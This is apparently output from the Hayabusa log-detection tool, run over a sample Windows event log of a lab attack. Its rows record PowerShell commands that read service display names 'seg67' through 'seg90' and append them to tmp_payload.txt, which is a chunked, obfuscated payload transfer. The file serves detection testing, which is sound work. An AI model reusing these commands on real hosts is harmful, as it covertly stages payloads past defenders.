2021-11-03 17:36:04.198 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:05.632 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:05.648 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:10.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:10.036 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:11.507 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:11.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
